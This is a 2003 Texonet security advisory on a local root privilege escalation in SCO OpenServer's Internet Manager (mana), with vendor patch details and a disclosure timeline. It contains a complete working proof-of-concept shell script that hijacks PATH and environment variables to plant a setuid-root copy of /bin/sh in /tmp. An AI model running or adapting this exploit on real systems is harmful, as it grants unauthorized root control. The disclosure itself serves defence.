TEXONET-20030902.txt

`-----------------------------------------------------------------------  
Texonet Security Advisory 20030902  
-----------------------------------------------------------------------  
Advisory ID : TEXONET-20030902  
Authors : Joel Soderberg and Christer Oberg  
Issue date : Tuesday, September 02, 2003  
Publish date : Monday, September 15, 2003  
Application : SCO OpenServer / Internet Manager (mana)  
Version(s) : 5.0.5 - 5.0.7  
Platforms : OpenServer  
Availability : http://www.texonet.com/advisories/TEXONET-20030902.txt  
-----------------------------------------------------------------------  
  
  
Problem:  
-----------------------------------------------------------------------  
A vulnerability in SCO Internet Manager (mana) program for OpenServer  
(SCO Unix) that lets local users gain root level privileges.  
  
  
Description:  
-----------------------------------------------------------------------  
Short description from SCO: "SCO Internet Manager - allowing users to  
easily configure and manage Internet and intranet servers."  
  
The SCO Internet Manager (mana) is designed to be run via the   
ncsa_httpd on port 615 and it is password protected.  
  
Running /usr/internet/admin/mana/mana locally is however possible.  
  
By exporting the environment variable REMOTE_ADDR and setting it to  
127.0.0.1 mana is tricked to execute the file menu.mana as if it was   
run via the nsca_httpd password protected area.  
  
An other interesting environment variable is PATH_INFO which tells mana  
what .mana file should be run.  
  
The file pass-err.mana contains the following lines:  
  
<TCL>  
if {[catch {exec hostname} hostName] != 0} {  
set hostName localhost  
}  
set mana(localHostName) $hostName  
return {}  
</TCL>  
  
This tells us that mana will execute "hostname" when this file is run.  
  
By changing the environment variables PATH_INFO to /pass-err.mana and  
PATH to ./:$PATH would make mana execute ./hostname with root  
privileges.  
  
  
Example (Simple POC):  
  
This proof of concept for OpenServer 5.0.7 should give any local user  
euid=0(root).  
  
  
$ uname -a  
SCO_SV openserv 3.2 5.0.7 i386  
$ id  
uid=200(test) gid=50(group) groups=50(group)  
$ sh mana-root.sh  
# id  
uid=200(test) gid=50(group) euid=0(root) groups=50(group)  
  
  
- Code Start -  
mana-root.sh  
----------------------------C-U-T---H-E-R-E----------------------------  
#!/bin/sh  
#  
# OpenServer 5.0.7 - Local mana root shell  
#  
#  
  
REMOTE_ADDR=127.0.0.1  
PATH_INFO=/pass-err.mana  
PATH=./:$PATH  
  
export REMOTE_ADDR  
export PATH_INFO  
export PATH  
  
echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname  
  
chmod 755 hostname  
  
/usr/internet/admin/mana/mana > /dev/null  
  
/tmp/sh  
  
----------------------------C-U-T---H-E-R-E----------------------------  
- Code End –  
  
  
Workaround:  
-----------------------------------------------------------------------  
The proper solution is to install the latest packages.  
  
Location of Fixed Binaries  
  
ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19  
  
  
Verification  
  
MD5 (VOL.000.000) = 37b55df2c9000c703a22baafbe9cef42  
  
md5 is available for download from ftp://ftp.sco.com/pub/security/tools  
  
  
Installing Fixed Binaries  
  
Upgrade the affected binaries with the following sequence:  
  
1) Download the VOL* files to the /tmp directory  
  
2) Run the custom command, specify an install from media images, and   
specify the /tmp directory as the location of the images.  
  
  
Disclosure Timeline:  
-----------------------------------------------------------------------  
9/02/2003: Vendor notified by e-mail  
9/03/2003: Vendor has verified the issue and is working on the solution  
9/15/2003: Public release  
  
  
About Texonet:  
-----------------------------------------------------------------------  
Texonet is a Swedish based security company with a focus on penetration  
testing / security assessments, research and development.  
  
  
Contacting Texonet:  
-----------------------------------------------------------------------  
E-mail: advisories(-at-)texonet.com  
Homepage: http://www.texonet.com/  
Phone: +46-8-55174611  
  
`